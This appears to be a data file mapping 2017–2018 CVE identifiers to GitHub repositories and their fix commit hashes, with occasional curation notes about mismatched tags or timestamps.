-CVE-2017-16615;https://github.com/thanethomson/MLAlchemy;None:None;False;bc795757febdcce430d89f9d08f75c32d6989d3c; -CVE-2017-16616;https://github.com/Stranger6667/pyanyapi;None:None;False;810db626c18ebc261d5f4299d0f0eac38d5eb3cf; -CVE-2017-16618;https://github.com/tadashi-aikawa/owlmixin;None:None;False;5d0575303f6df869a515ced4285f24ba721e0d4e; -CVE-2017-16759;https://github.com/librenms/librenms;None:None;False;7887b2e1c7158204ac69ca43beafce66e4d3a3b4,d3094fa6578b29dc34fb5a7d0bd6deab49ecc911; -CVE-2017-16762;https://github.com/sanic-org/sanic;None:None;False;18829e648a26d947b7e441a9d7d012a24b0adf48,ae09dec05e10816b37eed425c87e193d230c5a73,afd51e0823524eec683b226a20f40d958253064f; -CVE-2017-16792;https://github.com/geminabox/geminabox;None:None;False;e7e0b16147677e9029f0b55eff6bc6dda52398d4,f8429a9e364658459add170e4ebc7a5d3b4759e7; -CVE-2017-16876;https://github.com/lepture/mistune;None:None;False;5f06d724bc05580e7f203db2d4a4905fc1127f98; -CVE-2017-16877;https://github.com/vercel/next.js;None:None;False;02fe7cf63f6265d73bdaf8bc50a4f2fb539dcd00; commit timestamp is outside the time interval -CVE-2017-16880;https://github.com/filp/whoops;None:None;False;c16791d28d1ca3139e398145f0c6565c523c291a; -CVE-2017-17042;https://github.com/lsegal/yard;None:None;False;b0217b3e30dc53d057b1682506333335975e62b4; -CVE-2017-17485;https://github.com/FasterXML/jackson-databind;None:None;False;f031f27a31625d07922bdd090664c69544200a5d,978798382ceb72229e5036aa1442943933d6d171,bb45fb16709018842f858f1a6e1118676aaa34bd,2235894210c75f624a3d0cd60bfb0434a20a18bf; -CVE-2017-17760;https://github.com/opencv/opencv;None:None;False;70d49446e99f4caf701e4b007157ef41751bfb46,7bbe1a53cfc097b82b1589f7915a2120de39274c; -CVE-2017-17835;https://github.com/apache/airflow;None:None;False;6aca2c2d395952341ab1b201c59011920b5a5c77; commit timestamp is outside the time interval -CVE-2017-17837;https://github.com/apache/deltaspike;None:None;False;72e607f3be66c30c72b32c24b44e9deaa8e54608,4e2502358526b944fc5514c206d306e97ff271bb,d95abe8c01d256da2ce0a5a88f4593138156a4e5; -CVE-2017-18076;https://github.com/omniauth/omniauth;None:None;False;71866c5264122e196847a3980c43051446a03e9b,61df4e8198b2b33600830e00eaaae0ac0c4cabec; -CVE-2017-18077;https://github.com/juliangruber/brace-expansion;None:None;False;b13381281cead487cbdbfd6a69fb097ea5e456c3,ed46e5ba619bd938e5b84835fca00eed0adc5585; -CVE-2017-18239;https://github.com/jasongoodwin/authentikat-jwt;None:None;False;2d2fa0d40ac8f2f7aa7e9b070fa1a25eee082cb0; -CVE-2017-18361;https://github.com/Pylons/colander;None:None;False;1a17b237fed2fdd3ac0e04ec8bfb4b206c7fe046,d4f4f77a2cfa518426178bd69d2b29dee57f770d,98805557c10ab5ff3016ed09aa2d48c49b9df40b; -CVE-2017-18367;https://github.com/seccomp/libseccomp-golang;None:None;False;06e7a29f36a34b8cf419aeb87b979ee508e58f9e; -CVE-2017-18635;https://github.com/novnc/noVNC;None:None;False;6048299a138e078aed210f163111698c8c526a13,15ce2f71eb660c03237a58a589cd8ad84aa7f20d; -CVE-2017-1000001;https://github.com/fedora-infra/fedmsg;None:None;False;5c21cf88a24fac4c15340cfd68d6d7599ad4a4a2,2bb51cd8e7b2122b04421280ecc6e2db499f1170; -CVE-2017-1000042;https://github.com/mapbox/mapbox.js;None:None;False;538d229ab6767bb4c3f3969c417f9884189c1512,275e404057b221edd276b175e0165f23595ad35a; -CVE-2017-1000056;https://github.com/kubernetes/kubernetes;None:None;False;6f9074f06945247827499b196e0c5c23af1f5c72,ec040ef2521c8a67cc44e9ed323cbf0053268798,dd7561801aa7b7f00f1556d38a14488246821d91,52f6d3fbfb339605bb54bf04c5d8f6f4adc518f6,7fef0a4f6a44ea36f166c39fdade5324eff2dd5e; -CVE-2017-1000069;https://github.com/bitly/oauth2_proxy;None:None;False;4464655276877f1951fddf238cdfeca3cbca83ef,55085d9697962668fd4e43e8e4644144fe83cd93; -CVE-2017-1000070;https://github.com/bitly/oauth2_proxy;None:None;False;86d083266b747825a05f639560141e542019cf26,289a6ccf463a425c7606178c510fc5eeb9c8b050; -CVE-2017-1000188;https://github.com/mde/ejs;None:None;False;49264e0037e313a0a3e033450b5c184112516d8f; -CVE-2017-1000189;https://github.com/mde/ejs;None:None;False;49264e0037e313a0a3e033450b5c184112516d8f; -CVE-2017-1000209;https://github.com/TakahikoKawasaki/nv-websocket-client;None:None;False;a158795432699ff06568b66517db2ca9fde282b2,feb9c8302757fd279f4cfc99cbcdfb6ee709402d,fb23d30966b8abba920fa90b49201192c66f56bf; vulnerable tag is fixed -CVE-2017-1000228;https://github.com/mde/ejs;None:None;False;3d447c5a335844b25faec04b1132dbc721f9c8f6; -CVE-2017-1000246;https://github.com/IdentityPython/pysaml2;None:None;False;7323f5c20efb59424d853c822e7a26d1aa3e84aa,79d679883f0b198511ea5eeaaf53f1f625e8d938; -CVE-2017-1000248;https://github.com/redis-store/redis-store;None:None;False;ce13252c26fcc40ed4935c9abfeb0ee0761e5704,e0c1398d54a9661c8c70267c3a925ba6b192142e; -CVE-2017-1000389;https://github.com/jenkinsci/global-build-stats-plugin;None:None;False;8322b1333329f418ea89f7c3a1528b976f6a1ede; -CVE-2017-1000427;https://github.com/markedjs/marked;None:None;False;cd2f6f5b7091154c5526e79b5f3bfb4d15995a51,8f9d0b72f5606ed32057049f387161dd41c36ade; -CVE-2017-1000431;https://github.com/ezsystems/ezpublish-legacy;None:None;False;c7174295fa0b9bd81bd4af908082464b0b80f278; version is not a git tag -CVE-2017-1000433;https://github.com/IdentityPython/pysaml2;None:None;False;efe27e2f40bf1c35d847f935ba74b4b86aa90fb5,6312a41e037954850867f29d329e5007df1424a5; -CVE-2017-1000450;https://github.com/opencv/opencv;None:None;False;c58152d94ba878b2d7d76bcac59146312199b9eb,a729f985fdc23cd30f3e45909bd627bca1d53c6c,0202e527476daceec544e63068742f70d1dfe934,08a5fe3661b4cab8758e289927cfdc96c10458da,e15a56d142906aea4e7c009d28d7432c0f1cb3a1,c46521ad65bb7c8d5c55a9f696b6bd52acdd17b8; -CVE-2017-1000451;https://github.com/vvakame/fs-git;None:None;False;eb5f70efa5cfbff1ab299fa7daaa5de549243998; -CVE-2017-1000486;https://github.com/primefaces/primefaces;None:None;False;26e44eb7962cbdb6aa2f47eca0f230f3274358f0; -CVE-2017-1000487;https://github.com/codehaus-plexus/plexus-utils;None:None;False;b38a1b3a4352303e4312b2bb601a0d7ec6e28f41; -CVE-2017-1000491;https://github.com/rhysd/Shiba;None:None;False;e8a65b0f81eb04903eedd29500d7e1bedf249eab; -CVE-2017-1001002;https://github.com/josdejong/mathjs;None:None;False;8d2d48d81b3c233fb64eb2ec1d7a9e1cf6a55a90; -CVE-2017-1001003;https://github.com/josdejong/mathjs;None:None;False;a60f3c8d9dd714244aed7a5569c3dccaa3a4e761; -CVE-2017-1001004;https://github.com/josdejong/typed-function;None:None;False;6478ef4f2c3f3c2d9f2c820e2db4b4ba3425e6fe; -CVE-2017-1002150;https://github.com/fedora-infra/python-fedora;None:None;False;b27f38a67573f4c989710c9bfb726dd4c1eeb929; -CVE-2018-0737;https://github.com/openssl/openssl;None:None;False;6939eab03a6e23d2bd2c3f5e34fe1d48e542e787,54f007af94b8924a46786b34665223c127c19081,349a41da1ad88ad87825414752a8ff5fdd6a6c3f; -CVE-2018-0953;https://github.com/chakra-core/ChakraCore;None:None;False;71d7b389a8e01f1f29bff7202270f5ce1d63696a; -CVE-2018-1067;https://github.com/undertow-io/undertow;None:None;False;cc5b9bfb1a516e0102b7a2890277d1ba3132bc67,85d4478e598105fe94ac152d3e11e388374e8b86,f404cb68448c188f4d51b085b7fe4ac32bde26e0; -CVE-2018-1098;https://github.com/etcd-io/etcd;None:None;False;a7e5790c82039945639798ae9a3289fe787f5e56; unknown tags/vers -CVE-2018-1099;https://github.com/etcd-io/etcd;None:None;False;a7e5790c82039945639798ae9a3289fe787f5e56; unknown tags/vers -CVE-2018-1114;https://github.com/undertow-io/undertow;None:None;False;7f22aa0090296eb00280f878e3731bb71d40f9eb,882d5884f2614944a0c2ae69bafd9d13bfc5b64a; -CVE-2018-1193;https://github.com/cloudfoundry/gorouter;None:None;False;6734f35425ce1525660f7b231e030f2660eaf668,11d9b6ebcd319bb25b0e4ceb0b7628381a283785; -CVE-2018-1196;https://github.com/spring-projects/spring-boot;None:None;False;9b8cb9a4639af3b47b5eeec4f5a04261dcd2a058; -CVE-2018-1199;https://github.com/spring-projects/spring-security;None:None;False;65da28e4bf62f58fb130ba727cbbd621b44a36d1,0eef5b4b425ab42b9fa0fde1a3f36a37b92558f2,cb8041ba67635edafcc934498ef82707157fd22a; -CVE-2018-1259;https://github.com/spring-projects/spring-data-commons;None:None;False;b8974a292ab463a304eda987632be4d9c145f5f8,11d0aa1b396d8819a5a0d4933c5cfc72fe9ad102,fd94d3145d6cd2c41b07cdc76d6aa84319c1ad4d; -CVE-2018-1260;https://github.com/spring-projects/spring-security-oauth;None:None;False;70e5ba84ca98b7ab42c1900bdd9fa51b393d611f; -CVE-2018-1261;https://github.com/spring-projects/spring-integration-extensions;None:None;False;a5573eb232ff85199ff9bb28993df715d9a19a25; -CVE-2018-1263;https://github.com/spring-projects/spring-integration-extensions;None:None;False;d10f537283d90eabd28af57ac97f860a3913bf9b; -CVE-2018-1272;https://github.com/spring-projects/spring-framework;None:None;False;ab2410c754b67902f002bfcc0c3895bd7772d39f,e02ff3a0da50744b0980d5d665fd242eedea7675; -CVE-2018-1273;https://github.com/spring-projects/spring-data-commons;None:None;False;08d748a6fd0173a8ba0aa1f240c38afbdaf4ad9f,b1a20ae1e82a63f99b3afc6f2aaedb3bf4dc432a,ae1dd2741ce06d44a0966ecbd6f47beabde2b653; -CVE-2018-1274;https://github.com/spring-projects/spring-data-commons;None:None;False;06b0dab536963da78dadf2ba407e5937d81c348a,371f6590c509c72f8e600f3d05e110941607fbad,3d8576fe4e4e71c23b9e6796b32fd56e51182ee0; -CVE-2018-1284;https://github.com/apache/hive;None:None;False;cbcd846b7dee541595ceebdfb8ae367c11b1e666,f80a38ae1174553022deae4f8774918401d9756d,b0a58d245875dc1b3ac58a7cf1a61d3b17805e96; -CVE-2018-1304;https://github.com/apache/tomcat;None:None;False;723ea6a5bc5e7bc49e5ef84273c3b3c164a6a4fd,2d69fde135302e8cff984bb2131ec69f2e396964,5af7c13cff7cc8366c5997418e820989fabb8f48; -CVE-2018-1309;https://github.com/apache/nifi;None:None;False;28067a29fd13cdf8e21b440fc65c6dd67872522f; -CVE-2018-1314;https://github.com/apache/hive;None:None;False;c39b5d1bc3011cf900db4e7911232c1d0fb7f576,3b1d4fdfdfecbf162b60ec0e49a07595a8a51e79; commit timestamp is outside the time interval -CVE-2018-1320;https://github.com/apache/thrift;None:None;False;d973409661f820d80d72c0034d06a12348c8705e; -CVE-2018-1336;https://github.com/apache/tomcat;None:None;False;92cd494555598e99dd691712e8ee426a2f9c2e93; -CVE-2018-1339;https://github.com/apache/tika;None:None;False;1b6ca3685c196cfd89f5f95c19cc919ce10c5aff,ffb48dd29d0c2009490caefda75e5b57c7958c51; -CVE-2018-3711;https://github.com/fastify/fastify;None:None;False;7f2b88f7f523698b8bf258f8235c400af4532097,fabd2a011f2ffbb877394abe699f549513ffbd76,c42fd308d82aa57eb15a41d7dd60a2351302c64a,79edc6b8b726bcc2d394fc83479f14e9c5c10b34; -CVE-2018-3712;https://github.com/vercel/serve;None:None;False;6adad6881c61991da61ebc857857c53409544575; -CVE-2018-3714;https://github.com/nim579/node-srv;None:None;False;15be996c0520ac6e4dee0cf0808fc7e72effd2a2; -CVE-2018-3715;https://github.com/jarofghosts/glance;None:None;False;8cfd88e44ebd3f07e3a2eaf376a3e758b6c4ca19; -CVE-2018-3721;https://github.com/lodash/lodash;None:None;False;d8e069cc3410082e44eb18fcf8e7f3d08ebe1d4a; -CVE-2018-3726;https://github.com/omphalos/crud-file-server;None:None;False;4155bfe068bf211b49a0b3ffd06e78cbaf1b40fa; -CVE-2018-3728;https://github.com/hapijs/hoek;None:None;False;32ed5c9413321fbc37da5ca81a7cbab693786dee,5aed1a8c4a3d55722d1c799f2368857bf418d6df,623667e4ed606841137af84173c588667c8e882d; -CVE-2018-3731;https://github.com/tnantoka/public;None:None;False;eae8ad8017b260f8667ded5e12801bd72b877af2; this repo has no tag, -CVE-2018-3732;https://github.com/pillarjs/resolve-path;None:None;False;fe5b8052cafd35fcdafe9210e100e9050b37d2a0; -CVE-2018-3733;https://github.com/omphalos/crud-file-server;None:None;False;4fc3b404f718abb789f4ce4272c39c7a138c7a82; -CVE-2018-3738;https://github.com/protobufjs/protobuf.js;None:None;False;2ee1028d631a328e152d7e09f2a0e0c5c83dc2aa; -CVE-2018-3740;https://github.com/rgrove/sanitize;None:None;False;01629a162e448a83d901456d0ba8b65f3b03d46e; -CVE-2018-3741;https://github.com/rails/rails-html-sanitizer;None:None;False;f3ba1a839a35f2ba7f941c15e239a1cb379d56ae; -CVE-2018-3743;https://github.com/herber/hekto;None:None;False;408dd526e706246e2c2f378580c66036b768520e,1e5c75f8259ba0daf9b2600db3c246cda1934c46; -CVE-2018-3750;https://github.com/unclechu/node-deep-extend;None:None;False;9423fae877e2ab6b4aecc4db79a0ed63039d4703; -CVE-2018-3757;https://github.com/roest01/node-pdf-image;None:None;False;54679496a89738443917608c2bbe2f6e5dd20e83,15c13846a966c8513e30aff58471163a872b3b6d; -CVE-2018-3758;https://github.com/mrvautin/expressCart;None:None;False;65b18cfe426fa217aa6ada1d4162891883137893; -CVE-2018-3759;https://github.com/jtdowney/private_address_check;None:None;False;4068228187db87fea7577f7020099399772bb147; -CVE-2018-3769;https://github.com/ruby-grape/grape;None:None;False;6876b71efc7b03f7ce1be3f075eaa4e7e6de19af; -CVE-2018-3774;https://github.com/unshiftio/url-parse;None:None;False;53b1794e54d0711ceb52505e0f74145270570d5a; -CVE-2018-3777;https://github.com/restforce/restforce;None:None;False;fd31f1cb09d8363a27e6786ba1754941a1980eed,9765e0dd9b0e5408b4390aa51962641731d282d5; -CVE-2018-3778;https://github.com/moscajs/aedes;None:None;False;ffbc1702bb24b596afbb96407cc6db234a4044a8; fixed version is vulnerable (changed) -CVE-2018-3786;https://github.com/eggjs/egg-scripts;None:None;False;b98fd03d1e3aaed68004b881f0b3d42fe47341dd; -CVE-2018-5773;https://github.com/trentm/python-markdown2;None:None;False;1fb702d650d35f7a6fee7f8dbe819e53ceaff53e,c86fce76472a8bb0b94f5396b3ca8db7d3591bcd,1b1dcdd727c0ef03453b9f5ef5ae3679f1d72323,9fc2a371d174b4f253c6b8985eedd41ce90e42f0; -CVE-2018-5968;https://github.com/FasterXML/jackson-databind;None:None;False;038b471e2efde2e8f96b4e0be958d3e5a1ff1d05; -CVE-2018-6333;https://github.com/facebookarchive/nuclide;None:None;False;65f6bbd683404be1bb569b8d1be84b5d4c74a324; -CVE-2018-6341;https://github.com/facebook/react;None:None;False;5b19684fc3eddb44a790f31804707de9234147c7,ff41519ec2fea37643ecae7f87f8e15856247faf; -CVE-2018-6517;https://github.com/puppetlabs/chloride;None:None;False;592b5730dd910a4eae7abf8c94f1a2d990411074,0c70420f3e6133ecaaa9bb9cb079dc55cacd8d17; -CVE-2018-6591;https://github.com/conversejs/converse.js;None:None;False;ba09996998df38a5eb76903457fbb1077caabe25; -CVE-2018-6596;https://github.com/anymail/django-anymail;None:None;False;c07998304b4a31df4c61deddcb03d3607a04691b,db586ede1fbb41dce21310ea28ae15a1cf1286c5; -CVE-2018-6873;https://github.com/auth0/auth0.js;None:None;False;c9c5bd414324fbab071aaa29dcc11af4ca73181b; vulnerable tag is fixed -CVE-2018-7212;https://github.com/sinatra/sinatra;None:None;False;6bcc6c3499b0fae52900ae31e63676a22d4e6a72,d17aa95f5056c52daf5d7c3170fbfd831dc96381,ba7af51bd713267910078d055d01469e836fd64f; advisory links the wrong commit -CVE-2018-7260;https://github.com/phpmyadmin/composer;None:None;False;d2886a3e8745e8845633ae8a0054b5ee4d8babd5; -CVE-2018-7408;https://github.com/npm/npm;None:None;False;74e149da6efe6ed89477faa81fef08eee7999ad0; -CVE-2018-7489;https://github.com/FasterXML/jackson-databind;None:None;False;6799f8f10cc78e9af6d443ed6982d00a13f2e7d2,e66c0a9d3c926ff1b63bf586c824ead1d02f2a3d; -CVE-2018-7560;https://github.com/myshenin/aws-lambda-multipart-parser;None:None;False;56ccb03af4dddebc2b2defb348b6558783d5757e; -CVE-2018-7575;https://github.com/tensorflow/tensorflow;None:None;False;32298e892ae8186fba54f58ecbace840ef65f635,2006ef57602012939dc10d7e8961925b320d3ef6,d107fee1e4a9a4462f01564798d345802acc2aef; -CVE-2018-7576;https://github.com/tensorflow/tensorflow;None:None;False;c48431588e7cf8aff61d4c299231e3e925144df8; was 1.6.0:1.7.0 -CVE-2018-7651;https://github.com/zkat/ssri;None:None;False;d0ebcdc22cb5c8f47f89716d08b3518b2485d65d; -CVE-2018-7711;https://github.com/simplesamlphp/saml2;None:None;False;93fef13dea9c46dc238eb59e414d3ae76559d8c4,5d69753a61b4bfb95eed3ea0c3f8cbb4e6e0ad2f,4f6af7f69f29df8555a18b9bb7b646906b45924d; -CVE-2018-7750;https://github.com/paramiko/paramiko;None:None;False;118c0ec84a60e6d6fa0034922f7cb5011d4a07d5,e9dfd854bdaf8af15d7834f7502a0451d217bb8c,fa29bd8446c8eab237f5187d28787727b4610516; -CVE-2018-7753;https://github.com/mozilla/bleach;None:None;False;c5df5789ec3471a31311f42c2d19fc2cf21b35ef; -CVE-2018-8006;https://github.com/apache/activemq;None:None;False;d8c80a98212ee5d73a281483a2f8b3f517465f62,2373aa1320dec90a60d69001adcb0ce856d61d10; -CVE-2018-8008;https://github.com/apache/storm;None:None;False;1117a37b01a1058897a34e11ff5156e465efb692,0fc6b522487c061f89e8cdacf09f722d3f20589a,efad4cca2d7d461f5f8c08a0d7b51fabeb82d0af,f61e5daf299d6c37c7ad65744d02556c94a16a4b; -CVE-2018-8009;https://github.com/apache/hadoop;None:None;False;eaa2b8035b584dfcf7c79a33484eb2dffd3fdb11,11a425d11a329010d0ff8255ecbcd1eb51b642e3,6d7d192e4799b51931e55217e02baec14d49607b,bd98d4e77cf9f7b2f4b1afb4d5e5bad0f6b2fde3,cedc28d4ab2a27ba47e15ab2711218d96ec88d23,65e55097da2bb3f2fbdf9ba1946da25fe58bec98,12258c7cff8d32710fbd8b9088a930e3ce27432e,1373e3d8ad60e4da721a292912cb69243bfdf470,6a4ae6f6eeed1392a4828a5721fa1499f65bdde4,fc4c20fc3469674cb584a4fb98bac7e3c2277c96,e3236a9680709de7a95ffbc11b20e1bdc95a8605,745f203e577bacb35b042206db94615141fa5e6f,45a1c680c276c4501402f7bc4cebcf85a6fbc7f5; -CVE-2018-8013;https://github.com/apache/xmlgraphics-batik;None:None;False;c5e5734293920250f2876648ac93660afc1d2923; -CVE-2018-8014;https://github.com/apache/tomcat;None:None;False;d83a76732e6804739b81d8b2056365307637b42d,5877390a9605f56d9bd6859a54ccbfb16374a78b,60f596a21fd6041335a3a1a4015d4512439cecb5; -CVE-2018-8016;https://github.com/apache/cassandra;None:None;False;28ee665b3c0c9238b61a871064f024d54cddcc79; -CVE-2018-8017;https://github.com/apache/tika;None:None;False;62926cae31a02d4f23d21148435804b96c543cc7,45a1c680c276c4501402f7bc4cebcf85a6fbc7f5; -CVE-2018-8025;https://github.com/apache/hbase;None:None;False;f6c4405929055c7e3d7135f49015dfac707c58d6,5f03fb399c13ff1eebf4067af6dc11cdded1694d,f7e50346322c6ba0ee46e64c07677e9ea052718e,7c1366de453989f115935c1db31d082d6ef3f868,30e98b4455f971c9cb3c02ac7b2daeebe4ee6f2d,bf25c1cb7221178388baaa58f0b16a408e151a69,625d4d002620139f49c8201f95b789b6a715cd41,dbebacbcfcbf66fbddb7e1b4a416c89e39831c5b,0c42acbdf86d08af3003105a26a2201f75f2e2c3; -CVE-2018-8026;https://github.com/apache/lucene-solr;None:None;False;e21d4937e0637c7b7949ac463f331da9a42c07f9,d1baf6ba593561f39e2da0a71a8440797005b55c,3aa6086ed99fa7158d423dc7c33dae6da466b093,e5407c5a9710247e5f728aae36224a245a51f0b1,1880d4824e6c5f98170b9a00aad1d437ee2aa12b; fixed version is vulnerable -CVE-2018-8027;https://github.com/apache/camel;None:None;False;24eefa559fe6b310629d2bf00663d2679ec81b96,3fe03e361725b66c1c3eaa40bb11577fb3dc17b3,8467d644813a62f3a836c0c7dee8cf5a41de3c07; -CVE-2018-8030;https://github.com/apache/qpid-broker-j;None:None;False;881323e56620ea069d52885842652a6fbf3403c0,025b48f3193e2b10b1c41d2bc3bcfc9cfc238a27; -CVE-2018-8031;https://github.com/apache/tomee;None:None;False;b8bbf50c23ce97dd64f3a5d77f78f84e47579863; -CVE-2018-8037;https://github.com/apache/tomcat;None:None;False;ed4b9d791f9470e4c3de691dd0153a9ce431701b,ccf2e6bf5205561ad18c2300153e9173ec509d73; was 9.0.9:9.0.10 -CVE-2018-8038;https://github.com/apache/cxf-fediz;None:None;False;4c396acb42439e61cc63b0452dd22442d720b61b,b6ed9865d0614332fa419fe4b6d0fe81bc2e660d; -CVE-2018-8039;https://github.com/apache/cxf;None:None;False;8ed6208f987ff72e4c4d2cf8a6b1ec9b27575d4b,fae6fabf9bd7647f5e9cb68897a7d72b545b741b; -CVE-2018-8088;https://github.com/qos-ch/slf4j;None:None;False;d2b27fba88e983f921558da27fc29b5f5d269405,c15d3c1dab0c3398011dec3a16ad3e45b75ae70d,918a055bdf87867f69693cf82727fa435c489e25; tracer commit misses the good one -CVE-2018-8097;https://github.com/pyeve/eve;None:None;False;57c320b925164dbc579355b0a06affa903f2ca1f,f8f7019ffdf9b4e05faf95e1f04e204aa4c91f98; -CVE-2018-8128;https://github.com/chakra-core/ChakraCore;None:None;False;23848b1272067625ab50115c6f30a0b177c633ba; -CVE-2018-8177;https://github.com/chakra-core/ChakraCore;None:None;False;eb4b00bcd61a56d5ac66f4155870cba3178d3273; -CVE-2018-8178;https://github.com/chakra-core/ChakraCore;None:None;False;c8f723d99c484c3a31df2187cdd2893ac27506a3; -CVE-2018-8315;https://github.com/Microsoft/ChakraCore;None:None;False;e03b3e30160ac5846b246931634962ce6bd1db83; -CVE-2018-8359;https://github.com/chakra-core/ChakraCore;None:None;False;f8bdb180c4e9351f441e25dc818815d0c63af753; -CVE-2018-8381;https://github.com/chakra-core/ChakraCore;None:None;False;1b77d559416116f9719febb7dee3354150277588; -CVE-2018-8390;https://github.com/chakra-core/ChakraCore;None:None;False;63ae30a750a4a0b2a2eb61a35dd3d2fc10104a90; -CVE-2018-8416;https://github.com/dotnet/corefx;None:None;False;dabb4f5dc837550dc6835a7be9a6db8b8fd5fdc7,85b40be5e2df53df1b667442c0717242266d7b3f,c50af3eee993880dc31877dd596356639b2ee1f0,a0fcd23ace1c8d692988cd0da4391cf7bf5e0ce6; vulnerable tag is fixed -CVE-2018-8465;https://github.com/chakra-core/ChakraCore;None:None;False;7e235c914df50f4bb42efad55a7527350a7cc7ae; -CVE-2018-8473;https://github.com/Microsoft/ChakraCore;None:None;False;a27864395a53f0ebe27a71a004265c28383a4385; -CVE-2018-8510;https://github.com/chakra-core/ChakraCore;None:None;False;9b36ce832c9a81bb51e3b1a39067feadcd1e14d2; -CVE-2018-8541;https://github.com/chakra-core/ChakraCore;None:None;False;3bee8f018e15c803d87d8b2981d0522f6d58ecac; -CVE-2018-8899;https://github.com/IdentityServer/IdentityServer4;None:None;False;ce8a487521f87b8593bfb0cab14d7ebaed42079b,21d0da227f50ac102de469a13bc5a15d2cc0f895; -CVE-2018-9109;https://github.com/Studio-42/elFinder;None:None;False;157f471d7e48f190f74e66eb5bc73360b5352fd3; -CVE-2018-9110;https://github.com/Studio-42/elFinder;None:None;False;e6351557b86cc10a7651253d2d2aff7f6b918f8e; -CVE-2018-9206;https://github.com/blueimp/jQuery-File-Upload;None:None;False;aeb47e51c67df8a504b7726595576c1c66b5dc2f; -CVE-2018-9856;https://github.com/Kotti/Kotti;None:None;False;00b56681fa9fb8587869a5e00dcd56503081d3b9,69d3c8a5d7203ddaec5ced5901acf87baddd76be; -CVE-2018-10055;https://github.com/tensorflow/tensorflow;None:None;False;111e04aed22fdeed494580dae127720326c1b8ee,3c1d5bc91be37396c73060bf123ead784741c6ef,3a279f15fde94882c27670dee313ce501cba92b9,c89ab82a82585cdaa90bf4911980e9e845909e78; -CVE-2018-10092;https://github.com/Dolibarr/dolibarr;None:None;False;5d121b2d3ae2a95abebc9dc31e4782cbc61a1f39; -CVE-2018-10094;https://github.com/Dolibarr/dolibarr;None:None;False;7ade4e37f24d6859987bb9f6232f604325633fdd; -CVE-2018-10095;https://github.com/Dolibarr/dolibarr;None:None;False;1dc466e1fb687cfe647de4af891720419823ed56; -CVE-2018-10188;https://github.com/phpmyadmin/phpmyadmin;None:None;False;c6dd6b56e236a3aff953cee4135ecaa67130e641; -CVE-2018-10237;https://github.com/google/guava;None:None;False;7ec8718f1e6e2814dabaa4b9f96b6b33a813101c,f89ece5721b2f637fe754937ff1f3c86d80bb196; -CVE-2018-10366;https://github.com/rainlab/user-plugin;None:None;False;098c2bc907443d67e9e18645f850e3de42941d20; -CVE-2018-10862;https://github.com/wildfly/wildfly-core;None:None;False;77ea76eb5651ed1daf40a681a990bb65018d9535,40996ae6d5d3b6c1602a15f96b86a8d8a39b53eb; -CVE-2018-10903;https://github.com/pyca/cryptography;None:None;False;d4378e42937b56f473ddade2667f919ce32208cb; -CVE-2018-10912;https://github.com/keycloak/keycloak;None:None;False;40d129cf541e85e8d0d04a990be6e7954a0a5d2b,c64ecb1ab84e66fcb486423c1978d3b83852e8d2; -CVE-2018-10936;https://github.com/pgjdbc/pgjdbc;None:None;False;cdeeaca47dc3bc6f727c79a582c9e4123099526e; -CVE-2018-11039;https://github.com/spring-projects/spring-framework;None:None;False;dac97f1b7dac3e70ff603fb6fc9f205b95dd6b01,f2694a8ed93f1f63f87ce45d0bb638478b426acd,323ccf99e575343f63d56e229c25c35c170b7ec1; -CVE-2018-11040;https://github.com/spring-projects/spring-framework;None:None;False;b80c13b722bb207ddf43f53a007ee3ddc1dd2e26,874859493bbda59739c38c7e52eb3625f247b93a; -CVE-2018-11087;https://github.com/spring-projects/spring-amqp;None:None;False;444b74e95bb299af5e23ebf006fbb45d574fb95e,d64e7fa3993dac577c0973e0caf8c31d27ef5e44; -CVE-2018-11093;https://github.com/ckeditor/ckeditor5-link;None:None;False;8cb782eceba10fc481e4021cb5d25b2a85d1b04e; -CVE-2018-11248;https://github.com/lingochamp/FileDownloader;None:None;False;e8dd7724c9243b21181eb3d27a1715ed811ccfde,ff240b883490a84744705f9b4165719d7633f902,b023cc081bbecdd2a9f3549a3ae5c12a9647ed7f; -CVE-2018-11307;https://github.com/FasterXML/jackson-databind;None:None;False;27b4defc270454dea6842bd9279f17387eceb737,051bd5e447fbc9539e12a4fe90eb989dba0c656e,78e78738d69adcb59fdac9fc12d9053ce8809f3d; -CVE-2018-11627;https://github.com/sinatra/sinatra;None:None;False;12786867d6faaceaec62c7c2cb5b0e2dc074d71a,3742bddcee8eb5afd69cf51327c1716c506e1adc; -CVE-2018-11647;https://github.com/jaredhanson/oauth2orize-fprm;None:None;False;2bf9faee787eb004abbdfb6f4cc2fb06653defd5,d48b4dd0e5a25ee2094725d98c35e468f027afd8; -CVE-2018-11758;https://github.com/apache/cayenne;None:None;False;6fc896b65ed871be33dcf453cde924bf73cf83db,8d4c83abed024fc3a698148a122429022b89b590; -CVE-2018-11761;https://github.com/apache/tika;None:None;False;4e67928412ad56333d400f3728ecdb59d07d9d63,148adec1016acc122fa5e972f75d7029376998d9,bd9d75d8b0a85af2937047bfad04288c3044b2a6; -CVE-2018-11762;https://github.com/apache/tika;None:None;False;a09d853dbed712f644e274b497cce254f3189d57,c0fb57d9d20e8eb7cb77bce8742e4566a18f5db8; -CVE-2018-11771;https://github.com/apache/commons-compress;None:None;False;a41ce6892cb0590b2e658704434ac0dbcb6834c8; -CVE-2018-11775;https://github.com/apache/activemq;None:None;False;02971a40e281713a8397d3a1809c164b594abfbb,1e31df9800fc2db258f2458628bd9863c11b2846,69fad2a135689f6c31fbada1c397f2e0dfd90d3c,bde7097fb8173cf871827df7811b3865679b963d; -CVE-2018-11777;https://github.com/apache/hive;None:None;False;f0419dfaabe31dd7802c37aeebab101265907e1a,00c0ee7bc4b8492476b377a6edafcc33411f14b6,1a1d6ca1bc3ae840238dc345fa1eb2c7c28c8cb0; -CVE-2018-11784;https://github.com/apache/tomcat;None:None;False;efb860b3ff8ebcf606199b8d0d432f76898040da; -CVE-2018-11786;https://github.com/apache/karaf;None:None;False;103f33105a58c899706a0687bb334678e2fa1ee7,24fb477ea886e8f294dedbad98d2a2c4cb2a44f9; -CVE-2018-11787;https://github.com/apache/karaf;None:None;False;cfa213ad680ded70b70bf0c648891a06386ef632,434e52502528e91e20d2f87cec7732f1e6e554c2,1fc60d7792e1aa35970b8d967f88ca3381053172; -CVE-2018-11788;https://github.com/apache/karaf;None:None;False;cc3332e97fa53a579312894d08e383f321a96aed,0c36c50bc158739c8fc8543122a6740c54adafca; -CVE-2018-11797;https://github.com/apache/pdfbox;None:None;False;ea7d321b6e23cf017437846bcee4de19784cf6c8,bb5defd088bebd566d126df079d35b356ba0534a,2db39c139d935a8ba03e1ae3c012d2d41dd6912a; -CVE-2018-11798;https://github.com/apache/thrift;None:None;False;2a2b72f6c8aef200ecee4984f011e06052288ff2; 